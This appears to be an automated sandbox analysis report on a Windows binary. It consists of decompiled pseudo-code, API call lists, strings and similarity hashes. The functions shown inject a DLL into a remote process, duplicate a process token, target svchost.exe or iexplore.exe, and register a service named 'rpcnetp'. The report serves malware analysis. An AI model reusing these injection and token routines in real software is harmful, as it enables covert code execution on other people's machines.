0x001d3136
0x00000000
0x00000000
0x001d3138
0x001d313b
0x001d313e
0x001d3159
0x001d315b
0x001d3171
0x001d3173
0x001d3176
0x001d3176
0x001d3171
0x001d319d
0x001d31a3
0x001d31a8
0x001d31a8
0x001d31d1
0x001d31d5
0x001d3251
0x001d3251
0x001d3254
0x001d3278
0x001d327b
0x001d3284
0x001d3289
0x001d3294
0x001d3294
0x001d3294
0x001d3294
0x001d3298
0x001d32a5
0x001d32a5
0x001d3256
0x001d3256
0x001d325c
0x00000000
0x00000000
0x001d3273
0x00000000
0x001d3273
0x001d31da
0x001d321c
0x001d321f
0x00000000
0x00000000
0x001d3221
0x001d3227
0x001d322d
0x001d3236
0x001d3238
0x001d3238
0x001d323e
0x001d3247
0x001d3249
0x001d3249
0x00000000
0x001d323e
0x001d31e4
0x001d31f4
0x001d31f9
0x001d31fe
0x001d3207
0x001d3212
0x001d3212
0x001d321a
0x00000000
0x00000000
0x00000000
0x00000000
0x001d31ac
0x001d31ce
0x00000000
0x001d31ce
0x001d30ff

APIs
  • GetCurrentProcessId.KERNEL32(001D1410,00000184,001D3308,00000000,00000001,00000113,?,?,001D2421), ref: 001D30B4
  • OpenProcess.KERNEL32(001F0FFF,00000001,00000000,?,?,001D2421), ref: 001D30C1
    • Part of subcall function 001D3734: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,?,00000044,00000000,?,?,?,001D3118,?,00000104), ref: 001D3751
    • Part of subcall function 001D3734: lstrcatA.KERNEL32(?,\System32\svchost.exe,?,?,?,001D3118,?,00000104), ref: 001D3763
    • Part of subcall function 001D3734: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,?), ref: 001D377C
    • Part of subcall function 001D3734: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,001D3118,?,00000104), ref: 001D3799
    • Part of subcall function 001D3734: RegCloseKey.ADVAPI32(?,?,?,?,001D3118,?,00000104), ref: 001D37A9
    • Part of subcall function 001D2B08: GetModuleFileNameA.KERNEL32(?,00000104), ref: 001D2B23
    • Part of subcall function 001D2B08: lstrcpyA.KERNEL32(?,?,00000044,00000000,76E1EA18), ref: 001D2B59
    • Part of subcall function 001D2B08: lstrlenA.KERNEL32(?), ref: 001D2B5C
    • Part of subcall function 001D2B08: lstrcmpiA.KERNEL32(-00000003,001D11C8), ref: 001D2B6A
    • Part of subcall function 001D2B08: lstrcpyA.KERNEL32(-00000003,001D11C8), ref: 001D2B7C
    • Part of subcall function 001D2B08: CopyFileA.KERNEL32(?,?,00000000), ref: 001D2B89
    • Part of subcall function 001D2B08: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001D2BA0
    • Part of subcall function 001D2B08: SetFilePointer.KERNEL32(00000000,00000092,00000000,00000000), ref: 001D2BDF
    • Part of subcall function 001D2B08: WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 001D2BF1
    • Part of subcall function 001D2B08: CloseHandle.KERNEL32(00000000), ref: 001D2BF8
  • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000104), ref: 001D3151
  • SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 001D3169
  • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 001D3197
  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,?,00000000,00000000,?,?), ref: 001D31C8
    • Part of subcall function 001D3683: VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D369D
    • Part of subcall function 001D3683: lstrlenA.KERNEL32(?,00000000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36AE
    • Part of subcall function 001D3683: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36BB
    • Part of subcall function 001D3683: VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36E3
  • CloseHandle.KERNEL32(00000000), ref: 001D31A8
    • Part of subcall function 001D3020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
    • Part of subcall function 001D3020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
    • Part of subcall function 001D3020: GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
    • Part of subcall function 001D3020: CloseHandle.KERNEL32(?), ref: 001D3087
  • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 001D322D
  • CloseHandle.KERNEL32(?), ref: 001D3236
  • CloseHandle.KERNEL32(?), ref: 001D3247
  • CreateThread.KERNEL32(00000000,00000000,Function_00002965,?,00000000,?), ref: 001D326D
  • SetStdHandle.KERNEL32(000000F6,00000000), ref: 001D327B
    • Part of subcall function 001D2965: SetStdHandle.KERNEL32(000000F4,?,00000000,001D3289,?), ref: 001D296D
    • Part of subcall function 001D2965: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D2976
    • Part of subcall function 001D2965: CloseHandle.KERNEL32(?), ref: 001D297D
    • Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32C2
    • Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32CC
    • Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32D6
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 3
  • API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen
  • String ID: !$@
  • API String ID: 677720824-1106925043
  • Opcode ID: 48e15aef3bb8d9777781a255bb2fadf36b491b6b4ce89551302cf184b035be13
  • Instruction ID: d38df066d98dcb4c3f7fb2d5acdc6ed02fbc6297c1945d0034f45a0cc7f25a00
  • Opcode Fuzzy Hash: 1ED0A7C0494E42C1C125A5022CE13A7E244EF0129ECED037079802B6EFBF42313DEF0A
  • Instruction Fuzzy Hash: d38df066d98dcb4c3f7fb2d5acdc6ed02fbc6297c1945d0034f45a0cc7f25a00
C-Code - Quality: 88%
			E00403683(void* __ecx, void* _a4, void* _a8, char _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						_t7 =  &_a12; // 0x402421
						E00403020(_t20, _t18, __imp__LoadLibraryA, _t22,  *_t7,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}






0x00403683
0x00403686
0x00403687
0x0040368c
0x004036a3
0x004036a7
0x004036c3
0x004036cb
0x004036d6
0x004036d6
0x004036e3
0x004036e3
0x004036f0

APIs
  • VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,004031F9,?,?,00000000,?,00000000), ref: 0040369D
  • lstrlenA.KERNEL32(?,00000000,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036AE
  • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036BB
  • VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036E3
    • Part of subcall function 00403020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00402421,00000000,00000000), ref: 00403045
    • Part of subcall function 00403020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00403070
    • Part of subcall function 00403020: GetExitCodeThread.KERNEL32(?,?,?,?,!$@,004036DB,?,00000000,!$@,00000000,00000001,?,?,004031F9,?,?), ref: 0040307E
    • Part of subcall function 00403020: CloseHandle.KERNEL32(?), ref: 00403087
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
  • Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
  • Associated: 00000001.00000002.260196655.00407000.00000002.sdmp
Similarity
  • Total matches: 3
  • API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen
  • String ID:
  • API String ID: 677720824-0
  • Opcode ID: db6d812f9c7be18267a37d50a3ba51ee4b957c21e9a373aaaee3175b4369baed
  • Instruction ID: 20e9a58cd3c3d7d5d43ac1eac6eb645310d5d17e5d3f8f00a645a8e2a4464bb7
  • Opcode Fuzzy Hash: 70D0A780494E46F4C407B5424C2D326D344EF001D9CDE437074000A6F6BE4A322DEF4A
  • Instruction Fuzzy Hash: 20e9a58cd3c3d7d5d43ac1eac6eb645310d5d17e5d3f8f00a645a8e2a4464bb7
C-Code - Quality: 87%
			E001D3683(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						E001D3020(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}






0x001d3683
0x001d3686
0x001d3687
0x001d368c
0x001d36a3
0x001d36a7
0x001d36c3
0x001d36d6
0x001d36d6
0x001d36e3
0x001d36e3
0x001d36f0

APIs
  • VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D369D
  • lstrlenA.KERNEL32(?,00000000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36AE
  • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36BB
  • VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36E3
    • Part of subcall function 001D3020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
    • Part of subcall function 001D3020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
    • Part of subcall function 001D3020: GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
    • Part of subcall function 001D3020: CloseHandle.KERNEL32(?), ref: 001D3087
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: KillTimerPeekMessageSetTimer$DefWindowProcPostQuitMessageSetEvent
  • String ID: d
  • API String ID: 2989656138-2564639436
  • Opcode ID: 84e743ce579fb83e573cc9db47027a5d92d4bae25c0e57b22563aa8666223114
  • Instruction ID: f8f6ae56d72572d2a7ecf92d988ca55aad03d1572bbfb16aa9d6bab595837ed1
  • Opcode Fuzzy Hash: E9F046477B4A8431CD8BB564500D3E2E187676A2C2DED9667F9087228CDB8C77460E87
  • Instruction Fuzzy Hash: f8f6ae56d72572d2a7ecf92d988ca55aad03d1572bbfb16aa9d6bab595837ed1
C-Code - Quality: 100%
			E001D23B1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				int _t14;
				int _t17;
				void* _t20;
				int _t21;
				void* _t22;
				void* _t25;
				int _t28;
				_Unknown_base(*)()* _t32;
				void* _t34;
				struct HWND__* _t35;

				_t35 = _a4;
				_t14 = _a8;
				_t32 = 0;
				if(_t14 == 0) {
					L17:
					KillTimer(_t35, 0x64);
					do {
						_t17 = PeekMessageA( &_v32, _t35, 0x113, 0x113, 1);
						__eflags = _t17;
					} while (_t17 != 0);
					PostQuitMessage(_t32);
					__eflags = _a8 - 0x11;
					if(_a8 == 0x11) {
						L4:
						return DefWindowProcA(_t35, _a8, _a12, _a16);
					}
					L20:
					return 0;
				}
				_t20 = _t14 - 0xf;
				if(_t20 == 0) {
					 *0x1d5078 = 1;
					 *0x1d5049 = _t32;
					 *0x1d50bc = _t32;
					L12:
					_t21 = E001D1466(_t34, _a16);
					__eflags = _t21;
					if(_t21 != 0) {
						goto L20;
					}
					_t22 =  *0x1d50c8; // 0x0
					__eflags = _t22 - _t32;
					if(_t22 != _t32) {
						 *0x1d5078 = 1;
						SetEvent(_t22);
					}
					__eflags =  *0x1d5078 - _t32; // 0x0
					if(__eflags != 0) {
						goto L17;
					} else {
						SetTimer(_a4, 0x64, 0x6ddd00, _t32);
						goto L20;
					}
				}
				_t25 = _t20 - 0x102;
				if(_t25 == 0) {
					__eflags = _a12 - 0x64;
					if(_a12 != 0x64) {
						goto L4;
					}
					KillTimer(_t35, 0x64);
					do {
						_t28 = PeekMessageA( &_v32, _t35, 0x113, 0x113, 1);
						__eflags = _t28;
					} while (_t28 != 0);
					E001D32E0(_t32, _t34, _t35);
					__eflags =  *0x1d506c; // 0x0
					if(__eflags == 0) {
						SetTimer(_t35, 0x64, 0x6ddd00, 0);
					}
					goto L4;
				}
				if(_t25 == 0x2ed) {
					goto L12;
				}
				goto L4;
			}
















0x001d23bd
0x001d23c1
0x001d23c4
0x001d23c5
0x001d248d
0x001d2490
0x001d249b
0x001d24a4
0x001d24aa
0x001d24aa
0x001d24af
0x001d24b5
0x001d24b9
0x001d23de
0x00000000
0x001d23e8
0x001d24bf
0x00000000
0x001d24bf
0x001d23cb
0x001d23ce
0x001d243c
0x001d2443
0x001d2449
0x001d244f
0x001d2452
0x001d2457
0x001d2459
0x00000000
0x00000000
0x001d245b
0x001d2460
0x001d2462
0x001d2465
0x001d246c
0x001d246c
0x001d2472
0x001d2478
0x00000000
0x001d247a
0x001d2485
0x00000000
0x001d2485
0x001d2478
0x001d23d0
0x001d23d5
0x001d23f5
0x001d23f9
0x00000000
0x00000000
0x001d23fe
0x001d2409
0x001d2412
0x001d2418
0x001d2418
0x001d241c
0x001d2423
0x001d2429
0x001d2434
0x001d2434
0x00000000
0x001d2429
0x001d23dc
0x00000000
0x00000000
0x00000000

APIs
  • DefWindowProcA.USER32(?,00000011,?,?), ref: 001D23E8
  • KillTimer.USER32(?,00000064), ref: 001D23FE
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 001D2412
  • SetTimer.USER32(?,00000064,006DDD00,00000000), ref: 001D2434
    • Part of subcall function 001D1466: PostThreadMessageA.USER32(00000012,00000000,00000000), ref: 001D147F
    • Part of subcall function 001D1466: WaitForSingleObject.KERNEL32(00007530), ref: 001D1490
    • Part of subcall function 001D1466: CloseHandle.KERNEL32 ref: 001D149C
    • Part of subcall function 001D1466: CreateThread.KERNEL32(00000000,00000000,001D36F3,00000000,00000000,001D5088), ref: 001D1592
  • SetEvent.KERNEL32(00000000), ref: 001D246C
  • SetTimer.USER32(?,00000064,006DDD00,00000000), ref: 001D2485
  • KillTimer.USER32(?,00000064), ref: 001D2490
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 001D24A4
  • PostQuitMessage.USER32(00000000), ref: 001D24AF
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandleWaitForSingleObject$CreateEventCreateThreadPostMessageRegisterServiceCtrlHandler
  • String ID: rpcnetp
  • API String ID: 1312310708-3180878357
  • Opcode ID: 6fa48f6244e0a94e0ec1405d0d9bbe99e9497798e0a464c9f7457b8b0bb501eb
  • Instruction ID: 05a59ccedef4400ca5738f33da270d839a534878fef554df57ca7f90b4351e82
  • Opcode Fuzzy Hash: 56F0271719401EB3C803F8B38C6C73B17026B599C9EED734531627408CAA0D3244DF4B
  • Instruction Fuzzy Hash: 05a59ccedef4400ca5738f33da270d839a534878fef554df57ca7f90b4351e82
C-Code - Quality: 75%
			E001D34E1() {
				long _v32;
				int _t3;
				struct HWND__* _t10;
				intOrPtr _t17;
				void* _t21;

				 *0x1d504c = CreateEventA(0, 1, 0, 0);
				 *0x1d5050 = 0x10;
				 *0x1d505c = 0x42a;
				 *0x1d5060 = 1;
				_t3 = RegisterServiceCtrlHandlerA("rpcnetp", E001D2FDE);
				 *0x1d50b8 = _t3;
				if(_t3 != 0) {
					_push(0);
					_push(0x1388);
					_t17 = 2;
					_push(_t17);
					 *0x1d5058 = 1;
					E001D2619();
					 *0x1d5058 = 5;
					E001D2619(4, 0, 0);
					E001D35DB();
					 *0x1d505c = 0;
					 *0x1d5060 = 0;
					_t21 = CreateThread(0, 0, E001D2C05, 0, 0,  &_v32);
					if(_t21 != 0) {
						WaitForSingleObject( *0x1d504c, 0xffffffff);
						_t10 =  *0x1d50c0; // 0x0
						if(_t10 != 0) {
							PostMessageA(_t10, 0x11, 0, 0);
						}
						WaitForSingleObject(_t21, 0x7530);
						CloseHandle(_t21);
					} else {
						 *0x1d5060 = _t17;
					}
					CloseHandle( *0x1d504c);
					return E001D2619(1, 0, 0);
				}
				return _t3;
			}








0x001d34fd
0x001d3502
0x001d350c
0x001d3516
0x001d351c
0x001d3524
0x001d3529
0x001d3531
0x001d3532
0x001d3539
0x001d353a
0x001d353b
0x001d3541
0x001d354a
0x001d3554
0x001d3559
0x001d356c
0x001d3572
0x001d357e
0x001d3582
0x001d359a
0x001d359c
0x001d35a3
0x001d35aa
0x001d35aa
0x001d35b6
0x001d35b9
0x001d3584
0x001d3584
0x001d3584
0x001d35c5
0x00000000
0x001d35d4
0x001d35d8

APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D34ED
  • RegisterServiceCtrlHandlerA.ADVAPI32(rpcnetp,001D2FDE), ref: 001D351C
    • Part of subcall function 001D2619: SetServiceStatus.ADVAPI32(001D5050,001D3546,00000002,00001388,00000000), ref: 001D263F
    • Part of subcall function 001D35DB: RegOpenKeyExA.ADVAPI32(80000002,00000000,000F003F,?,00000000), ref: 001D35F9
    • Part of subcall function 001D35DB: RegDeleteValueA.ADVAPI32(?,?,?,00000002), ref: 001D3617
    • Part of subcall function 001D35DB: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000002), ref: 001D3630
    • Part of subcall function 001D35DB: RegCloseKey.ADVAPI32(?,?,00000002), ref: 001D3639
  • CreateThread.KERNEL32(00000000,00000000,001D2C05,00000000,00000000,?), ref: 001D3578
  • WaitForSingleObject.KERNEL32(000000FF), ref: 001D359A
  • PostMessageA.USER32(00000000,00000011,00000000,00000000), ref: 001D35AA
  • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 001D35B6
  • CloseHandle.KERNEL32(00000000), ref: 001D35B9
  • CloseHandle.KERNEL32 ref: 001D35C5
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: ReadProcessMemory$ExitThreadGetStdHandleResetEventSetEvent
  • String ID: x
  • API String ID: 3363633688-2363233923
  • Opcode ID: fde0bc8fb109669d3739e76c01462afd47aceeb39e8aeb63b7d363bff009e474
  • Instruction ID: d25dc53b450804b30b42871723f188176ff746c243b861f620f223eb1a999b37
  • Opcode Fuzzy Hash: 9FF02BD509C909B3D07734881B12F222385FF82DDDD4EDB3538B4642C6BF09A50AA754
  • Instruction Fuzzy Hash: d25dc53b450804b30b42871723f188176ff746c243b861f620f223eb1a999b37
C-Code - Quality: 84%
			E001D2165() {
				int _t51;
				void _t52;
				long _t54;
				void* _t56;
				intOrPtr* _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t65;
				void* _t67;
				intOrPtr _t69;
				void* _t70;

				_push(0xdb0);
				_push(0x1d1400);
				E001D1637(_t60, _t64, _t67);
				 *(_t70 - 0x1c) =  *(_t70 - 0x1c) & 0x00000000;
				_t61 = GetStdHandle(0xfffffff4);
				 *(_t70 - 4) =  *(_t70 - 4) & 0x00000000;
				_t65 =  *(_t70 + 8);
				if(ReadProcessMemory(_t61, _t65, _t70 - 0x30, 0x10, _t70 - 0x34) == 0) {
					L16:
					 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
					ExitThread( *(_t70 - 0x1c));
				}
				_t66 = _t65 -  *((intOrPtr*)(_t70 - 0x2c));
				if(ReadProcessMemory(_t61, _t65 -  *((intOrPtr*)(_t70 - 0x2c)), _t70 - 0x20, 4, _t70 - 0x34) == 0) {
					goto L16;
				}
				if( *(_t70 - 0x30) == 0x78 ||  *(_t70 - 0x30) == 0x1bc8) {
					__eflags =  *(_t70 - 0x24);
					if( *(_t70 - 0x24) == 0) {
						goto L15;
					}
					_t51 = ReadProcessMemory(_t61,  *(_t70 - 0x28), _t70 - 0xdc0,  *(_t70 - 0x24), _t70 - 0x34);
					__eflags = _t51;
					if(_t51 == 0) {
						goto L16;
					}
					_t52 =  *(_t70 - 0x30);
					_t62 =  *(_t70 - 0x20);
					_t69 = _t52 +  *(_t70 - 0x20);
					 *((intOrPtr*)(_t70 - 0x3c)) = _t69;
					__eflags = _t52 - 0x78;
					if(_t52 == 0x78) {
						_t56 = 0xd80 -  *((intOrPtr*)(_t69 + 8));
						 *((intOrPtr*)(_t70 - 0x40)) = 0xd80;
						__eflags =  *(_t70 - 0x24) - 0xd80;
						if( *(_t70 - 0x24) > 0xd80) {
							_t62 =  *(_t70 - 0x24) - _t56;
							__eflags =  *(_t70 - 0x24) - _t56;
							E001D176E(_t66,  *(_t70 - 0x24) - _t56, _t69, 0,  *(_t70 - 0x24) - _t56);
						}
					}
					_t54 = E001D20DA(_t61, _t62, _t69, _t70 - 0xdc0,  *(_t70 - 0x24));
					goto L14;
				} else {
					if( *(_t70 - 0x30) != 0x3708) {
						L15:
						 *(_t70 - 0x1c) = 1;
						 *( *(_t70 - 0x20) + 0x5c) =  *( *(_t70 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_t59 =  *(_t70 - 0x20) + 0x3708;
						 *((intOrPtr*)(_t70 - 0x38)) = _t59;
						_push( *_t59);
						if( *(_t70 - 0x28) == 0) {
							_t54 = ResetEvent();
						} else {
							_t54 = SetEvent();
						}
						L14:
						 *(_t70 - 0x1c) = _t54;
					}
					goto L16;
				}
			}















0x001d2165
0x001d216a
0x001d216f
0x001d2174
0x001d2180
0x001d2182
0x001d2190
0x001d219f
0x001d227a
0x001d227a
0x001d2281
0x001d2281
0x001d21af
0x001d21b8
0x00000000
0x00000000
0x001d21c2
0x001d21fd
0x001d2201
0x00000000
0x00000000
0x001d2215
0x001d2217
0x001d2219
0x00000000
0x00000000
0x001d221b
0x001d221e
0x001d2221
0x001d2224
0x001d2227
0x001d222a
0x001d2231
0x001d2234
0x001d2237
0x001d223a
0x001d223f
0x001d223f
0x001d2245
0x001d2245
0x001d223a
0x001d2255
0x00000000
0x001d21cd
0x001d21d4
0x001d225f
0x001d225f
0x001d2269
0x001d21da
0x001d21dd
0x001d21e2
0x001d21e5
0x001d21eb
0x001d21f5
0x001d21ed
0x001d21ed
0x001d21ed
0x001d225a
0x001d225a
0x001d225a
0x00000000
0x001d21d4

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D217A
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D219B
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21B4
  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21ED
  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21F5
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 001D2215
    • Part of subcall function 001D20DA: SetEvent.KERNEL32(?,?,?), ref: 001D2147
    • Part of subcall function 001D176E: ResetEvent.KERNEL32(?,?,?,?,?,001D1CDD,?,?,00000240,?,?), ref: 001D17B5
  • ExitThread.KERNEL32 ref: 001D2281
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: GetEnvironmentVariableRegCloseKeyRegOpenKeyRegQueryValueExlstrcat
  • String ID: [FILE]$SystemRoot$[FILE]
  • API String ID: 4133047914-1656360392
  • Opcode ID: ae84fe3816e58394a110c5285e10b2d815e972e04ba8194b59fa15e7161023db
  • Instruction ID: ed5e67ec67d69c723361dcf29c487c07ff661bc4f43c96eb3a608c29c8c24653
  • Opcode Fuzzy Hash: 09D02ECA440F87F8661BB080082DF82B092FE633C04EC63003440592C18F8CB16FEF90
  • Instruction Fuzzy Hash: ed5e67ec67d69c723361dcf29c487c07ff661bc4f43c96eb3a608c29c8c24653
C-Code - Quality: 100%
			E001D3734(void* __ecx, char* _a4, void* _a8) {
				int _v8;
				int _v12;
				char* _t13;
				char* _t23;
				long _t27;
				void* _t29;

				_t27 = _a8;
				_t23 = 0;
				_t29 =  *0x1d506c - _t23; // 0x0
				if(_t29 != 0 || GetEnvironmentVariableA("SystemRoot", _a4, _t27) == 0) {
					if(RegOpenKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe",  &_a8) == 0) {
						_v8 = _t27;
						if(RegQueryValueExA(_a8, _t23, _t23,  &_v12, _a4,  &_v8) == 0) {
							_t23 = 1;
						}
						RegCloseKey(_a8);
					}
					_t13 = _t23;
				} else {
					lstrcatA(_a4, "\\System32\\svchost.exe");
					_t13 = 1;
				}
				return _t13;
			}









0x001d373a
0x001d373e
0x001d3740
0x001d3746
0x001d3784
0x001d3796
0x001d37a1
0x001d37a5
0x001d37a5
0x001d37a9
0x001d37a9
0x001d37af
0x001d375b
0x001d3763
0x001d376b
0x001d376b
0x001d37b4

APIs
  • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,?,00000044,00000000,?,?,?,001D3118,?,00000104), ref: 001D3751
  • lstrcatA.KERNEL32(?,\System32\svchost.exe,?,?,?,001D3118,?,00000104), ref: 001D3763
  • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,?), ref: 001D377C
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,001D3118,?,00000104), ref: 001D3799
  • RegCloseKey.ADVAPI32(?,?,?,?,001D3118,?,00000104), ref: 001D37A9
Strings
  • SystemRoot, xrefs: 001D374C
  • Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 001D3772
  • \System32\svchost.exe, xrefs: 001D375B
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: GetStdHandle$CloseHandleCreateRemoteThreadResumeThreadWaitForMultipleObjects
  • String ID: <
  • API String ID: 2446352009-4251816714
  • Opcode ID: c8242842e98a66eb1eacbd90598b53cfcf33de66ab7a76e9081f6078d45f9eb3
  • Instruction ID: d914cf60e619c89091d9c255d0f38381d528009b3ccf1d544689daf830366f30
  • Opcode Fuzzy Hash: ED0168420642E5B3F54776C41649B2051A1EF43AF5E2C032379BDB26C81B88AE29BF89
  • Instruction Fuzzy Hash: d914cf60e619c89091d9c255d0f38381d528009b3ccf1d544689daf830366f30
C-Code - Quality: 93%
			E001D27E6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t56;
				void* _t73;
				void* _t78;
				void* _t83;
				void* _t84;

				_push(0xe4);
				_push(0x1d13d0);
				E001D1637(__ebx, __edi, __esi);
				 *(_t84 - 0x20) = 0;
				 *(_t84 - 0x1c) = 0;
				 *((intOrPtr*)(_t84 - 0x28)) = 0;
				 *(_t84 - 0x20) = GetStdHandle(0xfffffff4);
				E001D384D(_t84 - 0xb4, 0, 0x40);
